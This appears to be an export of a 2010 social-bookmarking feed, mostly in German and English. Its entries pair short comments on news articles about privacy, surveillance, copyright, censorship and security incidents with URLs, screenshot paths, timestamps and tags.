Location RecordsAmi-Zeugs: +This morning, the Third Circuit Court of Appeals in Philadelphia issued its highly anticipated ruling in a hotly contested cell phone location privacy case. EFF filed a friend-of-the-court brief and participated at oral argument in the case, arguing that federal electronic privacy law gives judges the discretion to deny government requests for cell phone location data when the government fails to show probable cause that a crime has been committed.<p>Ami-Zeugs: + This morning, the Third Circuit Court of Appeals in Philadelphia issued its highly anticipated ruling in a hotly contested cell phone location privacy case. EFF filed a friend-of-the-court brief and participated at oral argument in the case, arguing that federal electronic privacy law gives judges the discretion to deny government requests for cell phone location data when the government fails to show probable cause that a crime has been committed. +</p>http://www.eff.org/deeplinks/2010/09/breaking-news-eff-location-privacy-win-courts-maypage_shots/2010/09/07/courtsmayrequiresearchwarrantsforcellphone.pngcourtsmayrequiresearchwarrantsforcellphone11012010-09-07 21:45:567gsm tracking warrantLatest leaked draft of secret copyright treaty: US trying to cram DRM rules down the world's throatsParticularly disturbing is the growing support for "three-strikes" copyright rules that would disconnect whole families from the Internet if one member of the household was accused (without proof) of copyright infringement. The other big US agenda item is cramming pro-Digital Rights Management (DRM) rules down the world's throats that go way beyond the current obligations under the UN's WIPO Copyright Treaty. In the US version, breaking DRM is always illegal, even if you're not committing any copyright violation -- so breaking the DRM on your iPad to install software you bought from someone who hasn't gone through the Apple approval process is illegal, even though the transaction involves no illicit copying. + +Ironically, this DRM push comes just as the US courts and regulators have begun to erode the US's own extreme rules on the subject. Or perhaps this isn't so surprising: in the past, the US copyright lobby has torpedoed the courts and Congress by getting USA to commit to international agreements that went far beyond the rules that they could push through on their own at home.<p>Particularly disturbing is the growing support for "three-strikes" copyright rules that would disconnect whole families from the Internet if one member of the household was accused (without proof) of copyright infringement. The other big US agenda item is cramming pro-Digital Rights Management (DRM) rules down the world's throats that go way beyond the current obligations under the UN's WIPO Copyright Treaty. In the US version, breaking DRM is always illegal, even if you're not committing any copyright violation -- so breaking the DRM on your iPad to install software you bought from someone who hasn't gone through the Apple approval process is illegal, even though the transaction involves no illicit copying. +</p> +<p>Ironically, this DRM push comes just as the US courts and regulators have begun to erode the US's own extreme rules on the subject. Or perhaps this isn't so surprising: in the past, the US copyright lobby has torpedoed the courts and Congress by getting USA to commit to international agreements that went far beyond the rules that they could push through on their own at home. +</p>http://www.michaelgeist.ca/content/view/5285/125/page_shots/2010/09/07/latestleakeddraftofsecretcopyrighttreatyus.pnglatestleakeddraftofsecretcopyrighttreatyus131012010-09-07 16:26:307acta, bürgerrechte, copyfight, digital media, dmcaGlobe Genie: random teleporter for Google Street ViewMIT grad student Joe McMichael's Globe Genie reminds me the Hyperspace button in the Asteroids arcade game. Just hit "Shuffle" and it takes you somewhere random on Earth, via Google's Street View. Simple but effective!<p>MIT grad student Joe McMichael's Globe Genie reminds me the Hyperspace button in the Asteroids arcade game. Just hit "Shuffle" and it takes you somewhere random on Earth, via Google's Street View. Simple but effective! +</p>http://web.mit.edu/~jmcmicha/www/globegenie/page_shots/2010/09/07/globegenierandomteleporterforgooglestreetv.pngglobegenierandomteleporterforgooglestreetv131012010-09-07 16:18:157google openstreetmap streetviewWhiskey from diabetics' urineGilpin Family whisky is a new single malt whisky made from the urine of diabetics. Creator James Gilpin doesn't sell the stuff, but rather gives away bottles as a public health statement.<p>Gilpin Family whisky is a new single malt whisky made from the urine of diabetics. Creator James Gilpin doesn't sell the stuff, but rather gives away bottles as a public health statement. +</p>http://www.independent.co.uk/life-style/food-and-drink/whizky-worlds-first-bio-whisky-aged-with-granny-whiz-2070491.htmlpage_shots/2010/09/07/whiskeyfromdiabeticsurine_.pngwhiskeyfromdiabeticsurine131012010-09-07 13:47:417diabetes gesundheit nahrungsmittel urine whiskeyheise online - Internet Explorer: Datenklau durch zwei Jahre alte Lücke2 Jahr alte Lücke zur Umgehung der Same Origin Policy.<p>2 Jahr alte Lücke zur Umgehung der Same Origin Policy. +</p>http://www.heise.de/newsticker/meldung/Internet-Explorer-Datenklau-durch-zwei-Jahre-alte-Luecke-1073060.htmlpage_shots/2010/09/06/heiseonline-internetexplorerdatenklaudurch.pngheiseonline-internetexplorerdatenklaudurch11012010-09-06 20:18:027ie microsoftDuke Nukem Forever: Und der King kommt doch (Update) - Golem.deEin Pappaufsteller und eine Twitternachricht: Mit einfachen Mitteln hat Gearbox heute verkündet, dass Duke Nukem Forever im Jahr 2011 kommen wird. + +Dreizehn Jahre hat es gedauert, doch nun kümmert sich das Entwicklerstudio Gearbox um den dauerverspäteten und immer wieder aufs Neue angekündigen Shooter Duke Nukem Forever.<p>Ein Pappaufsteller und eine Twitternachricht: Mit einfachen Mitteln hat Gearbox heute verkündet, dass Duke Nukem Forever im Jahr 2011 kommen wird. +</p> +<p>Dreizehn Jahre hat es gedauert, doch nun kümmert sich das Entwicklerstudio Gearbox um den dauerverspäteten und immer wieder aufs Neue angekündigen Shooter Duke Nukem Forever. +</p>http://www.golem.de/1009/77710.htmlpage_shots/2010/09/06/dukenukemforeverundderkingkommtdochupdat.pngdukenukemforeverundderkingkommtdochupdat11012010-09-06 00:20:227gameAMD switching to easy peel-off laptop stickers – Computer Chips & Hardware Technology | Geek.comhttp://www.geek.com/articles/chips/amd-switching-to-easy-peel-off-laptop-stickers-2010092/page_shots/2010/09/05/amdswitchingtoeasypeel-offlaptopstickersc.pngamdswitchingtoeasypeel-offlaptopstickersc141012010-09-05 12:43:427PM under fire for new Bill. Washington would control who boards Canadian flights over U.S.A bill introduced in Canada's House of Commons would give US Department of Homeland Security officials "final say over who may board aircraft in Canada if they are to fly over the United States en route to a third country." <p>A bill introduced in Canada's House of Commons would give US Department of Homeland Security officials "final say over who may board aircraft in Canada if they are to fly over the United States en route to a third country." +</p>http://www.montrealgazette.com/news/Canada+says+Uncle+wants+your+data/3214360/story.htmlpage_shots/2010/09/04/pmunderfirefornewbillwashingtonwouldcontr.pngpmunderfirefornewbillwashingtonwouldcontr131012010-09-04 11:46:027airport bürgerrechte security terror theater tsa Löschwelle für Linuxtag &#8211; Veranstaltungen auf Wikipedia - Gisbers.de - für diejenigen, die es interessiert&#8230;Neue Rubrik: Löschvorschlag des Monats + +Auf Wikipedia gibt es zur Zeit eine kleine Löschwelle für Linuxtag – Veranstaltungen. Nachdem der erste Löschantrag die Seite der OpenRheinRuhr betroffen hat ist der nächste auf die Idee gekommen die Seiten der FrOSCon und des Brandenburger Linux-Infotag ebenfalls zur Löschung vorzuschlagen. + +Die Begründung für den Löschungsantrag ist die fehlende Relevanz und das nicht Erreichen der Messlatte für Messen. + +Auf den Löschkandidatenseiten entwickelt sich gerade eine interessante Diskussion wie sich Relevanz darstellt.<p>Neue Rubrik: Löschvorschlag des Monats +</p> +<p>Auf Wikipedia gibt es zur Zeit eine kleine Löschwelle für Linuxtag – Veranstaltungen. Nachdem der erste Löschantrag die Seite der OpenRheinRuhr betroffen hat ist der nächste auf die Idee gekommen die Seiten der FrOSCon und des Brandenburger Linux-Infotag ebenfalls zur Löschung vorzuschlagen. +</p> +<p>Die Begründung für den Löschungsantrag ist die fehlende Relevanz und das nicht Erreichen der Messlatte für Messen. +</p> +<p>Auf den Löschkandidatenseiten entwickelt sich gerade eine interessante Diskussion wie sich Relevanz darstellt. +</p>http://gisbers.de/2010/08/25/loschwellefurlinuxtagveranstaltungenaufwikipedia/page_shots/2010/09/09/loschwellefurlinuxtag8211veranstaltungen.pngloschwellefurlinuxtag8211veranstaltungen11012010-09-03 22:26:497löschen wikipediaSpamers are pingingEvtl. nur PR? Hab kein Ping. +Security firm Sophos is warning that Apple's Ping social networking service has been blighted by spammers just days after launch. + +Read more: http://www.v3.co.uk/v3/news/2269198/ping-pong-spammers#ixzz0yUwfXbMW +The V3 App store has games, downloads and more. Visit the store now.<p>Evtl. nur PR? Hab kein Ping. + Security firm Sophos is warning that Apple's Ping social networking service has been blighted by spammers just days after launch. +</p> +<p>Read more: http://www.v3.co.uk/v3/news/2269198/ping-pong-spammers#ixzz0yUwfXbMW + The V3 App store has games, downloads and more. Visit the store now. +</p>http://www.v3.co.uk/v3/news/2269198/ping-pong-spammerspage_shots/2010/09/03/spamersarepinging.pngspamersarepinging11012010-09-03 21:55:167apple ping EU-Kommission diskutiert Inhaltefilter/DPI gegen p2p : netzpolitik.orgDie französische Webseite pcinpact.com hat einige interne Dokumente einer von der EU-Kommission angeleierten Diskussion innerhalb der “Generaldirektion Binnenmarkt und Dienstleistungen” veröffentlicht. Zu den Diskussionsgesprächen wurden Vertreter der Rechteindustrie und der Provider eingeladen, um weitere Durchsetzungsmaßnahmen gegen Urheberrechtsvergehen im Rahmen der IPR-Enforcement-Directive und eine freiwillige Kooperation zwischen ISPs und Rechteindustrie zu diskutieren.<p>Die französische Webseite pcinpact.com hat einige interne Dokumente einer von der EU-Kommission angeleierten Diskussion innerhalb der “Generaldirektion Binnenmarkt und Dienstleistungen” veröffentlicht. Zu den Diskussionsgesprächen wurden Vertreter der Rechteindustrie und der Provider eingeladen, um weitere Durchsetzungsmaßnahmen gegen Urheberrechtsvergehen im Rahmen der IPR-Enforcement-Directive und eine freiwillige Kooperation zwischen ISPs und Rechteindustrie zu diskutieren. +</p>http://www.netzpolitik.org/2010/eu-kommission-diskutiert-inhaltefilterdpi-gegen-p2p/page_shots/2010/09/03/eu-kommissiondiskutiertinhaltefilterdpigegen.pngeu-kommissiondiskutiertinhaltefilterdpigegen11012010-09-03 21:51:207censorship contentmafia euGoogle Wave Developer Blog: Wave open source next steps: "Wave in a Box"Immerhin schmeißen sie es nicht in eine Tonne. Google Wave wird FOSS.<p>Immerhin schmeißen sie es nicht in eine Tonne. Google Wave wird FOSS. +</p>http://googlewavedev.blogspot.com/2010/09/wave-open-source-next-steps-wave-in-box.htmlpage_shots/2010/09/03/googlewavedeveloperblogwaveopensourcenext.pnggooglewavedeveloperblogwaveopensourcenext11012010-09-03 21:47:267google wavePentagon declined to investigate hundreds of purchases of child pornography | The Upshot Yahoo! News - Yahoo! NewsVllt. hatten sie ja recht und wir müssen ChildPorn sprerren. Verfolgt werden ja die DoD Typen offensichtlich nicht. + +A 2006 Immigration and Customs Enforcement investigation into the purchase of child pornography online turned up more than 250 civilian and military employees of the Defense Department -- including some with the highest available security clearance -- who used credit cards or PayPal to purchase images of children in sexual situations. But the Pentagon investigated only a handful of the cases, Defense Department records show.<p>Vllt. hatten sie ja recht und wir müssen ChildPorn sprerren. Verfolgt werden ja die DoD Typen offensichtlich nicht. +</p> +<p>A 2006 Immigration and Customs Enforcement investigation into the purchase of child pornography online turned up more than 250 civilian and military employees of the Defense Department -- including some with the highest available security clearance -- who used credit cards or PayPal to purchase images of children in sexual situations. But the Pentagon investigated only a handful of the cases, Defense Department records show. +</p>http://news.yahoo.com/s/yblog_upshot/20100903/us_yblog_upshot/pentagon-declined-to-investigate-hundreds-of-purchases-of-child-pornographypage_shots/2010/09/03/pentagondeclinedtoinvestigatehundredsofpurch.pngpentagondeclinedtoinvestigatehundredsofpurch11012010-09-03 21:39:557child porn, dodPreschoolers being radio-tagged Mary Robinette Kowal sez, "Preschoolers in Richmond, California are being handed RFID jerseys when they get to school. The ACLU points out that in addition to the privacy concerns, these are not secure tags. It has the potential to make kidnapping and stalking very easy." <p>Mary Robinette Kowal sez, "Preschoolers in Richmond, California are being handed RFID jerseys when they get to school. The ACLU points out that in addition to the privacy concerns, these are not secure tags. It has the potential to make kidnapping and stalking very easy." +</p>http://www.aclu.org/blog/technology-and-liberty/dont-let-schools-chip-your-kidspage_shots/2010/09/03/preschoolersbeingradio-tagged_.pngpreschoolersbeingradio-tagged131012010-09-03 17:55:297aclu bürgerrechte rfid surveillance trackingDatenklo NachbauDatenklo rebuild.<p>Datenklo rebuild. +</p>http://runningserver.com/?page=runningserver.content.datenklopage_shots/2010/09/03/datenklonachbau.pngdatenklonachbau11012010-09-03 10:43:057datenklo historicheise online - Bürgerrechtler: Vorratsdatenspeicherung laut Kriminalitätsstatistik überflüssigIm Jahr 2008, als Verbindungsdaten nur sporadisch gespeichert wurden, seien 167.451 Internet-Straftaten registriert worden, sie konnten zu 79,8 Prozent aufgeklärt werden, erläutern die Bürgerrechtler in einer Mitteilung. Im Jahr 2009, in dem alle Interneteinwahlen und E-Mails für sechs Monate protokolliert worden seien, habe die Polizei demgegenüber 206.909 Internet-Straftaten registriert. 75,7 Prozent davon seien aufgeklärt worden.<p>Im Jahr 2008, als Verbindungsdaten nur sporadisch gespeichert wurden, seien 167.451 Internet-Straftaten registriert worden, sie konnten zu 79,8 Prozent aufgeklärt werden, erläutern die Bürgerrechtler in einer Mitteilung. Im Jahr 2009, in dem alle Interneteinwahlen und E-Mails für sechs Monate protokolliert worden seien, habe die Polizei demgegenüber 206.909 Internet-Straftaten registriert. 75,7 Prozent davon seien aufgeklärt worden. +</p>http://www.heise.de/newsticker/meldung/Buergerrechtler-Vorratsdatenspeicherung-laut-Kriminalitaetsstatistik-ueberfluessig-1071139.htmlpage_shots/2010/09/02/heiseonline-burgerrechtlervorratsdatenspeiche.pngheiseonline-burgerrechtlervorratsdatenspeiche11012010-09-02 22:42:287vorratsdatenspeicherungPing review / Analyse von spiegel.dehttp://www.spiegel.de/netzwelt/gadgets/0,1518,715323,00.htmlpage_shots/2010/09/02/pingreviewanalysevonspiegelde.pngpingreviewanalysevonspiegelde11012010-09-02 22:03:007apple, ping, social networkMicrosoft Patents Operating System Shutdown | ConceivablyTechMicrosoft just received confirmation of a patent that hands the company the intellectual property of shutting an operating system down. + +von Fefe.<p>Microsoft just received confirmation of a patent that hands the company the intellectual property of shutting an operating system down. +</p> +<p>von Fefe. +</p>http://www.conceivablytech.com/2530/products/microsoft-patents-operating-system-shutdown/page_shots/2010/09/02/microsoftpatentsoperatingsystemshutdownconc.pngmicrosoftpatentsoperatingsystemshutdownconc11012010-09-02 10:45:127microsoft patentNRW: Grüne wollen Jugendmedienschutz-Staatsvertrag (JMStV) zustimmen » PottblogNRW: Grüne wollen Jugendmedienschutz-Staatsvertrag (JMStV) zustimmen<p>NRW: Grüne wollen Jugendmedienschutz-Staatsvertrag (JMStV) zustimmen +</p>http://www.pottblog.de/2010/09/01/nrw-gruene-wollen-jugendmedienschutz-staatsvertrag-jmstv-zustimmen/page_shots/2010/09/02/nrwgrunewollenjugendmedienschutz-staatsvertrag.pngnrwgrunewollenjugendmedienschutz-staatsvertrag11012010-09-02 00:08:397jmstv nrwSource Code des PS3-Hacks veröffentlichtUm das Kopierschutzsystem zu überwinden, geht der simulierte USB-Hub in mehreren Schritten vor und gaukelt der PS3 den Anschluss verschiedener Geräte in einer bestimmten Reihenfolge vor – wobei er mehrere Pufferüberläufe provoziert, um unterschiedliche Daten und Code auf den Stack zu schreiben. Im letzten Schritt wird der gesamte Code ausgeführt.<p>Um das Kopierschutzsystem zu überwinden, geht der simulierte USB-Hub in mehreren Schritten vor und gaukelt der PS3 den Anschluss verschiedener Geräte in einer bestimmten Reihenfolge vor – wobei er mehrere Pufferüberläufe provoziert, um unterschiedliche Daten und Code auf den Stack zu schreiben. Im letzten Schritt wird der gesamte Code ausgeführt. +</p>http://www.heise.de/newsticker/meldung/Source-Code-des-PS3-Hacks-veroeffentlicht-1070859.htmlpage_shots/2010/09/01/sourcecodedesps3-hacksveroffentlicht.pngsourcecodedesps3-hacksveroffentlicht141012010-09-01 19:45:377bufferoverflow opensource ps3Algerian Hackers Attack Wrong Website - ITProPortal.comA group of misinformed Algerian 'cyber-pirates' attacked the official website of the Belvoir Castle, mistaking it for the Belvoir Fortress in Israel. + +The pirate group, known as Dz-SeC, hijacked the website and displayed anti-Jewish slogans in Arabic on the homepage, along with a picture of the Algerian national flag. + +A spokesperson for the Belvoir Castle said in a statement to The Telegraph that “We've nothing to do with the Middle-East. I just help to organise the teddy bears' picnic. It does make more sense that they meant to target the fortress in Israel rather than the castle in Leicestershire.” +<p>A group of misinformed Algerian 'cyber-pirates' attacked the official website of the Belvoir Castle, mistaking it for the Belvoir Fortress in Israel. +</p> +<p>The pirate group, known as Dz-SeC, hijacked the website and displayed anti-Jewish slogans in Arabic on the homepage, along with a picture of the Algerian national flag. +</p> +<p>A spokesperson for the Belvoir Castle said in a statement to The Telegraph that “We've nothing to do with the Middle-East. I just help to organise the teddy bears' picnic. It does make more sense that they meant to target the fortress in Israel rather than the castle in Leicestershire.” +</p>http://www.itproportal.com/portal/news/article/2010/9/1/algerian-hackers-attack-wrong-website/page_shots/2010/09/01/no_page_shot.pngalgerianhackersattackwrongwebsite-itproporta11012010-09-01 17:47:057defacementObama administration: &quot;Piracy is flat, unadulterated theft&quot;Change we can believe in.<p>Change we can believe in. +</p>http://arstechnica.com/tech-policy/news/2010/08/obama-administration-piracy-is-flat-unadulterated-theft.arspage_shots/2010/08/31/obamaadministrationquotpiracyisflatunadul.pngobamaadministrationquotpiracyisflatunadul11012010-08-31 23:16:467obama piracyJudge: No Difference Between Cell Phone Tracking and GPS Vehicle TrackingJudge James Orenstein in the Eastern District of New York ruled last Friday that historical cell phone location data is just as intrusive to privacy as GPS tracking. <p>Judge James Orenstein in the Eastern District of New York ruled last Friday that historical cell phone location data is just as intrusive to privacy as GPS tracking. +</p>http://www.aclu.org/blog/technology-and-liberty/judge-no-difference-between-cell-phone-tracking-and-gps-vehicle-trackingpage_shots/2010/08/31/judgenodifferencebetweencellphonetrackinga.pngjudgenodifferencebetweencellphonetrackinga131012010-08-31 21:05:517bürgerrechte gps gsm handy politics polizeistaat trackingWelcome to Evoke 2010 &raquo; Evoke 2010Evoke Demo Party im Bericht von [heise](http://www.heise.de/newsticker/meldung/Evoke-2010-Party-mit-Wuerfeln-Pasta-und-freizuegigem-Geldautomat-1069635.html) + +N' bissl bewerben, so dass die Leute mal in youtube gucken...<p>Evoke Demo Party im Bericht von <a href="http://www.heise.de/newsticker/meldung/Evoke-2010-Party-mit-Wuerfeln-Pasta-und-freizuegigem-Geldautomat-1069635.html">heise</a> +</p> +<p>N' bissl bewerben, so dass die Leute mal in youtube gucken... +</p>http://www.evoke.eu/2010/page_shots/2010/08/31/welcometoevoke2010raquoevoke2010.pngwelcometoevoke2010raquoevoke201011012010-08-31 15:05:077evokeHackers blind quantum cryptographersQuantum hackers have performed the first 'invisible' attack on two commercial quantum cryptographic systems. By using lasers on the systems — which use quantum states of light to encrypt information for transmission — they have fully cracked their encryption keys, yet left no trace of the hack. + +Genau das sollte ja nie möglich sein, oder?<p>Quantum hackers have performed the first 'invisible' attack on two commercial quantum cryptographic systems. By using lasers on the systems — which use quantum states of light to encrypt information for transmission — they have fully cracked their encryption keys, yet left no trace of the hack. +</p> +<p>Genau das sollte ja nie möglich sein, oder? +</p>http://www.nature.com/news/2010/100829/full/news.2010.436.htmlpage_shots/2010/08/30/hackersblindquantumcryptographersnaturenews_.pnghackersblindquantumcryptographersnaturenews11012010-08-30 22:10:287crypto hack quantum For Immediate Release: GATES FOUNDATION INVESTS IN MONSANTO - Community Alliance for Global JusticeDie Gates Stiftung tut ja sooo viel Gutes! Hat in [Südafrika im Chemical Valley](http://www.commondreams.org/headlines07/0107-03.htm) investiert, in die Pharma-Lobby und jetzt in Monsanto. <p>Die Gates Stiftung tut ja sooo viel Gutes! Hat in <a href="http://www.commondreams.org/headlines07/0107-03.htm">Südafrika im Chemical Valley</a> investiert, in die Pharma-Lobby und jetzt in Monsanto. +</p>http://www.seattleglobaljustice.org/2010/08/for-immediate-release-gates-foundation-invests-in-monsanto/page_shots/2010/08/30/forimmediatereleasegatesfoundationinvests.pngforimmediatereleasegatesfoundationinvests11012010-08-30 22:01:517microsoftKillerspiele sollen als Politiker-Ausrede wegfallen - The Inquirer DEDie Bundestags-LAN-Party soll die Zeigfinger-Mentalität vieler Politiker ändern, sagen die drei Initiatoren. »Killerspiele« sind eben nicht an allem Ungemach der Welt schuld.Die LAN-Party, die im Herbst im Bundestag stattfinden soll, wird eine »differenzierte Betrachtungsweise« fördern, meinen die drei Initiatoren der Aktion. + +Dorothee Bär (CSU), Jimmy Schulz (FDP) und Manuel Höferlin (auch FDP) wollen in einem Land, in dem LAN-Parties verboten aber Schützenvereine erlaubt werden , alle Abgeordneten einladen und dabei auch »einen etwas gewaltsameren Shooter« anbieten<p>Die Bundestags-LAN-Party soll die Zeigfinger-Mentalität vieler Politiker ändern, sagen die drei Initiatoren. »Killerspiele« sind eben nicht an allem Ungemach der Welt schuld.Die LAN-Party, die im Herbst im Bundestag stattfinden soll, wird eine »differenzierte Betrachtungsweise« fördern, meinen die drei Initiatoren der Aktion. +</p> +<p>Dorothee Bär (CSU), Jimmy Schulz (FDP) und Manuel Höferlin (auch FDP) wollen in einem Land, in dem LAN-Parties verboten aber Schützenvereine erlaubt werden , alle Abgeordneten einladen und dabei auch »einen etwas gewaltsameren Shooter« anbieten +</p>http://www.theinquirer.de/2010/08/25/killerspiele-sollen-als-politiker-ausrede-wegfallen.htmlpage_shots/2010/08/30/killerspielesollenalspolitiker-ausredewegfalle.pngkillerspielesollenalspolitiker-ausredewegfalle11012010-08-30 17:43:237bundestag killerspiele Google, Facebook To Microsoft&#8217;s Paul Allen: Your Argument Is Invalid http://techcrunch.com/2010/08/27/paul-allen-google-faceboo/page_shots/2010/08/28/googlefacebooktomicrosoft8217spaulallen.pnggooglefacebooktomicrosoft8217spaulallen11012010-08-28 09:52:407microsoft patentNokia Siemens slammed for supplying snoop tech to Iran • The RegisterAn Iranian journalist imprisoned in that country without trial since June 2009 is suing telecommunications concern Nokia Siemens for allegedly providing the surveillance equipment that led to his capture. + +Isa Saharkhiz went into hiding following Iran's 2009 presidential elections, after publishing an article branding the Grand Ayatollah as a hypocrite who was primarily responsible for vote tallies widely regarded as being fraudulent.<p>An Iranian journalist imprisoned in that country without trial since June 2009 is suing telecommunications concern Nokia Siemens for allegedly providing the surveillance equipment that led to his capture. +</p> +<p>Isa Saharkhiz went into hiding following Iran's 2009 presidential elections, after publishing an article branding the Grand Ayatollah as a hypocrite who was primarily responsible for vote tallies widely regarded as being fraudulent. +</p>http://www.theregister.co.uk/2010/08/23/nokia_siemens_spy_centers/page_shots/2010/08/27/nokiasiemensslammedforsupplyingsnooptechto.pngnokiasiemensslammedforsupplyingsnooptechto11012010-08-27 23:59:027surveillanceGlibc Is Finally Free Softwarehttp://yro.slashdot.org/story/10/08/26/2339249/Glibc-Is-Finally-Free-Software?from=rsspage_shots/2010/08/27/glibcisfinallyfreesoftware.pngglibcisfinallyfreesoftware141012010-08-27 18:54:557glibc gnu gpl rpc sunKapitulationserklärung gegenüber Kinderschändern - Arbeitskreis gegen Internet-Sperren und Zensur (AK Zensur)AK Zensur veröffentlicht BKA-Dokumente, die zeigen: das »Löschen« wurde bisher halbherzig durchgeführt, deswegen will BKA Sperren<p>AK Zensur veröffentlicht BKA-Dokumente, die zeigen: das »Löschen« wurde bisher halbherzig durchgeführt, deswegen will BKA Sperren +</p>http://ak-zensur.de/2010/08/kapitulation.htmlpage_shots/2010/08/27/kapitulationserklarunggegenuberkinderschandern.pngkapitulationserklarunggegenuberkinderschandern11012010-08-27 15:57:027censorshipDrogeriekette: 150.000 Kundendaten von Schlecker waren frei zugänglich - SPIEGEL ONLINE - Nachrichten - Wirtschaft150.000 Datensätze von Online-Kunden der Drogeriekette konnten im Internet abgerufen werden. +Dazu gehörten der Vor- und Nachname, die Adresse, das Geschlecht, die E-Mail-Adresse und das Kundenprofil. Außerdem waren 7,1 Millionen E-Mail-Adressen von Newsletter-Kunden der Drogeriefirma abrufbar. + +Detail aus dem Artikel: +So zeigte vor kurzem eine Untersuchung der Unternehmensberatung Accenture, dass bei fast 70 Prozent der deutschen Unternehmen und Behörden in den vergangenen zwei Jahren Daten von Kunden und Mitarbeitern abhandengekommen sind. Fast ein Drittel hatte in dem Zeitraum sogar sechsmal oder häufiger Daten verloren.<p>150.000 Datensätze von Online-Kunden der Drogeriekette konnten im Internet abgerufen werden. + Dazu gehörten der Vor- und Nachname, die Adresse, das Geschlecht, die E-Mail-Adresse und das Kundenprofil. Außerdem waren 7,1 Millionen E-Mail-Adressen von Newsletter-Kunden der Drogeriefirma abrufbar. +</p> +<p>Detail aus dem Artikel: + So zeigte vor kurzem eine Untersuchung der Unternehmensberatung Accenture, dass bei fast 70 Prozent der deutschen Unternehmen und Behörden in den vergangenen zwei Jahren Daten von Kunden und Mitarbeitern abhandengekommen sind. Fast ein Drittel hatte in dem Zeitraum sogar sechsmal oder häufiger Daten verloren. +</p>http://www.spiegel.de/wirtschaft/unternehmen/0,1518,714051,00.htmlpage_shots/2010/08/27/drogeriekette150000kundendatenvonschleckerw.pngdrogeriekette150000kundendatenvonschleckerw11012010-08-27 11:00:277dataloss schleckerUS movie tickets get biggest price hike in historyHilfe! Filesharer machen die Kinos und die Filmindustrie kaputt. +Box-Office Zahlen zeigen das Gegenteil. +the industry has been hauling in the cash at the box office. 2007, 2008, and 2009 all set new historic highs for movie theater revenue in the US and Canada, and 2010 looks poised to do even bigger business.<p>Hilfe! Filesharer machen die Kinos und die Filmindustrie kaputt. + Box-Office Zahlen zeigen das Gegenteil. + the industry has been hauling in the cash at the box office. 2007, 2008, and 2009 all set new historic highs for movie theater revenue in the US and Canada, and 2010 looks poised to do even bigger business. +</p>http://arstechnica.com/tech-policy/news/2010/08/us-movie-tickets-get-biggest-price-hike-in-history.arspage_shots/2010/08/26/usmovieticketsgetbiggestpricehikeinhistory.pngusmovieticketsgetbiggestpricehikeinhistory11012010-08-26 21:34:097contentmafia, file sharing2010 smashes vulnerability records - V3.co.uk - formerly vnunet.comEs wird nicht besser... +Vulnerability disclosures reached record levels in the first half of 2010,according to the latest report from IBM‘s X-Force security team. +<p>Es wird nicht besser... + Vulnerability disclosures reached record levels in the first half of 2010,according to the latest report from IBM‘s X-Force security team. +</p>http://www.v3.co.uk/v3/news/2268714/ibm-force-reports-2010-breakingpage_shots/2010/08/26/2010smashesvulnerabilityrecords-v3couk-fo.png2010smashesvulnerabilityrecords-v3couk-fo11012010-08-26 11:14:517vulnerabilityBad flash drive caused worst U.S. military breach | InSecurity Complex - CNET NewsUSB-Sticks sind die Bootsektorviren der heutigen Zeit. +A malware-laden flash drive inserted in a laptop at a U.S. military base in the Middle East in 2008 led to the "most significant breach of" the nation's military computers ever, according to a new magazine article by a top defense official.<p>USB-Sticks sind die Bootsektorviren der heutigen Zeit. + A malware-laden flash drive inserted in a laptop at a U.S. military base in the Middle East in 2008 led to the "most significant breach of" the nation's military computers ever, according to a new magazine article by a top defense official. +</p>http://news.cnet.com/8301-27080_3-20014732-245.htmlpage_shots/2010/08/26/badflashdrivecausedworstusmilitarybreach.pngbadflashdrivecausedworstusmilitarybreach11012010-08-26 11:13:257memorystick vulnerabilityPirate Bay has stolen 46x the amount of USD that existAccording to the RIAA the Pirate Bay has stolen 46 the amount of USD that exist.<p>According to the RIAA the Pirate Bay has stolen 46 the amount of USD that exist. +</p>http://cache.gawker.com/assets/images/comment/4/2010/07/87a2852446ae55d1f15656d49f913e94/original.jpgpage_shots/2010/08/25/piratebayhasstolen46xtheamountofusdthate.pngpiratebayhasstolen46xtheamountofusdthate11012010-08-25 17:55:067contentmafia piratebay riaa USA setzen mobile Nacktscanner auf der Straße ein : netzpolitik.orgmobile röntgenscanner in den usa und .de<p>mobile röntgenscanner in den usa und .de +</p>http://www.netzpolitik.org/2010/usa-setzen-mobile-nacktscanner-auf-der-strase-ein/page_shots/2010/08/25/usasetzenmobilenacktscanneraufderstraeei.pngusasetzenmobilenacktscanneraufderstraeei11012010-08-25 16:45:017nacktscannerStreetview and the Church: The world belongs to God, not Google. A council member of the same southwest German church summarized the theological motivation for resisting Street View: “The world belongs to God, not Google.” +[Glaube Aktuell](http://www.glaubeaktuell.net/portal/nachrichten/nachricht.php?IDD=1281955643&IDDParent=1067270799) m(<p> A council member of the same southwest German church summarized the theological motivation for resisting Street View: “The world belongs to God, not Google.” + <a href="http://www.glaubeaktuell.net/portal/nachrichten/nachricht.php?IDD=1281955643&amp;IDDParent=1067270799">Glaube Aktuell</a> m( +</p>http://blogs.ssrc.org/tif/2010/08/19/google-god-and-the-public/page_shots/2010/08/25/streetviewandthechurchtheworldbelongstogo.pngstreetviewandthechurchtheworldbelongstogo11012010-08-25 13:31:187church streetviewCat-trashing lady outed by internet in less than 24 hours - Boing BoingYesterday, Mark posted a disturbing video of a middle-aged woman petting a cat and then throwing it—alive—into a trash bin. Mark today posted an update that she's now under police protection. What hasn't been talked about yet on Boing Boing is what happened between those two posts. 4chan happened.<p>Yesterday, Mark posted a disturbing video of a middle-aged woman petting a cat and then throwing it—alive—into a trash bin. Mark today posted an update that she's now under police protection. What hasn't been talked about yet on Boing Boing is what happened between those two posts. 4chan happened. +</p>http://www.boingboing.net/2010/08/24/internet-finds-cat-t.htmlpage_shots/2010/08/25/cat-trashingladyoutedbyinternetinlessthan2.pngcat-trashingladyoutedbyinternetinlessthan211012010-08-25 13:23:0674chanFull-Body Scan Technology Deployed In Street-Roving VansAs the privacy controversy around full-body security scans begins to simmer, it’s worth noting that courthouses and airport security checkpoints aren’t the only places where backscatter x-ray vision is being deployed. The same technology, capable of seeing through clothes and walls, has also been rolling out on U.S. streets. American Science & Engineering, a company based in Billerica, Massachusetts, has sold U.S. and foreign government agencies more than 500 backscatter x-ray scanners mounted in vans that can be driven past neighboring vehicles to see their contents, Joe Reiss, a vice president of marketing at the company told me in an interview.<p>As the privacy controversy around full-body security scans begins to simmer, it’s worth noting that courthouses and airport security checkpoints aren’t the only places where backscatter x-ray vision is being deployed. The same technology, capable of seeing through clothes and walls, has also been rolling out on U.S. streets. American Science &amp; Engineering, a company based in Billerica, Massachusetts, has sold U.S. and foreign government agencies more than 500 backscatter x-ray scanners mounted in vans that can be driven past neighboring vehicles to see their contents, Joe Reiss, a vice president of marketing at the company told me in an interview. 